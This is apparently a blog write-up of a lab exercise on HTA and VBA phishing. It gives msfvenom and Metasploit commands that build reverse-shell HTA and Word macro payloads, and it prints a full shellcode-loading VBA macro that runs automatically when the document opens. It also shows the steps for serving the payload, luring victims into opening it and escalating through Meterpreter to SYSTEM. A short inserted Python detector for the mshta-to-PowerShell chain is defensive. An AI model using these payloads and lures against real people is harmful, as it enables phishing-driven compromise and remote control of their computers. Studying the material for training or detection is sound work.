HTA and VBA phishing techniques

HTA

Method 1: deliver a payload and catch a reverse shell

Generate the payload with msfvenom:

user@machine$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7692 bytes
Saved as: thm.hta

Start a listener on the attacking machine:

nc -lnvp 443

Serve the generated payload over HTTP from the attacking machine so the target can fetch it:

user@machine$ python3 -m http.server 8090
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/)

Lure the victim into opening the link http://10.8.232.37:8090/payload.hta. Once the user opens it and clicks Run in the prompt, the shell comes back on the listener.

Method 2: generate a URL payload directly with msf

Use msf to create the URL payload directly, then send the generated URL to the victim and lure them into clicking it:

msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set LHOST 10.8.232.37
LHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set LPORT 443
LPORT => 443
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.8.232.37
SRVHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.8.232.37:443
[*] Using URL: http://10.8.232.37:8080/TkWV9zkd.hta
[*] Server started.

As soon as the target visits the URL, a shell comes back:

[*] 10.10.201.254    hta_server - Delivering Payload
[*] Sending stage (175174 bytes) to 10.10.201.254
[*] Meterpreter session 1 opened (10.8.232.37:443 -> 10.10.201.254:61629) at 2021-11-16 06:15:46 -0600
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-1AU6NT4
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > shell
Process 4124 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\app>
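Detection logic for the mshta.exe chain above, as an added example that is not part of the original post: it scans process-creation events (constructed here in a Sysmon Event ID 1 style; the field names, sample paths and the base64 string are assumptions) for mshta.exe running a remote .hta and for mshta.exe handing off to PowerShell, which is what an hta-psh payload does.

```python
"""Flag the mshta.exe -> PowerShell chain that an hta-psh payload produces.

Added example, not part of the original post. Events are constructed in a
Sysmon Event ID 1 style (Image, ParentImage, CommandLine); in practice they
would come from an EDR or SIEM export.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample: the victim opens the served .hta, mshta.exe runs it and
# launches an encoded PowerShell command; the notepad event is benign noise.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://10.8.232.37:8090/payload.hta'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -nop -w hidden -e QQBCAEMA"},  # placeholder base64
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\thm\notes.txt"},
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
ENCODED_CMD = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> list[str]:
    """Return the detection labels that apply to one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        hits.append("mshta_remote_hta")          # HTA fetched from a URL
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        hits.append("mshta_spawns_script_host")  # hta-psh hands off to PowerShell
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_CMD.search(cmd):
        hits.append("powershell_encoded_command")
    return hits

def scan(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Keep only the events that triggered at least one label."""
    return [(e["Image"], hits) for e in events if (hits := classify(e))]

if __name__ == "__main__":
    for image, labels in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(labels)}")
```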

VBA (doc)

Create a VBA payload with msfvenom:

┌──(root㉿kali)-[/home/kali/Templates]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.117.17 LPORT=443 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of vba file: 2691 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ruxaew As Long, ByVal Cmeflgr As Long, ByVal Onzbovppb As LongPtr, Bxlbqkmbx As Long, ByVal Exhgt As Long, Jyma As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Ooqll As Long, ByVal Onit As Long, ByVal Mksyyx As Long, ByVal Iqtta As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Alid As LongPtr, ByRef Cdzwe As Any, ByVal Gnzaegy As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Ruxaew As Long, ByVal Cmeflgr As Long, ByVal Onzbovppb As Long, Bxlbqkmbx As Long, ByVal Exhgt As Long, Jyma As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Ooqll As Long, ByVal Onit As Long, ByVal Mksyyx As Long, ByVal Iqtta As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Alid As Long, ByRef Cdzwe As Any, ByVal Gnzaegy As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Rwvjscoep As Long, Emvu As Variant, Fci As Long
#If Vba7 Then
        Dim  Rhgrl As LongPtr, Xgld As LongPtr
#Else
        Dim  Rhgrl As Long, Xgld As Long
#EndIf
        Emvu = Array(252,232,143,0,0,0,96,49,210,100,139,82,48,139,82,12,137,229,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,87,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,1,211,80,133,201,116,60,73,139, _
52,139,1,214,49,255,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,10,10,117,17,104,2,0,1,187,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

        Rhgrl = VirtualAlloc(0, UBound(Emvu), &H1000, &H40)
        For Fci = LBound(Emvu) To UBound(Emvu)
                Rwvjscoep = Emvu(Fci)
                Xgld = RtlMoveMemory(Rhgrl + Fci, Rwvjscoep, 1)
        Next Fci
        Xgld = CreateThread(0, 0, Rhgrl, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Document_Open()
        Auto_Open
End Sub

Note: one change is needed for this to work. As generated, the output targets an MS Excel workbook, so Workbook_Open() has to be renamed to Document_Open() for it to run in an MS Word document (the listing above already shows the renamed procedure).

Create a new macro in the document, paste the generated payload into the editor that opens, and save the file as a Word 97-2003 template.

Send the file to the victim and lure them into opening it; on the attacker side, start the msf handler. In the capture below the handler fails to bind because port 443 is still held by the handler from an earlier session (session 1 in the session list further down), and it is that existing handler that catches the new connection:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.117.17
lhost => 10.10.117.17
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to 10.10.117.17:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

Once the victim opens the document, a shell comes back:

[*] Meterpreter session 4 opened (10.10.117.17:443 -> 10.10.232.227:49781) at 2025-04-10 09:39:01 +0100

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-1AU6NT4  10.10.117.17:443 -> 10.10.232.227:49735 (10.10.232.227)
  4         meterpreter x86/windows  DESKTOP-1AU6NT4\thm @ DESKTOP-1AU6NT4  10.10.117.17:443 -> 10.10.232.227:49781 (10.10.232.227)

msf6 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ps
...
 1704  712   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
...

meterpreter > migrate 1944
[*] Migrating from 2844 to 1944...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Posted 2025-12-04 16:25 by shinianyunyan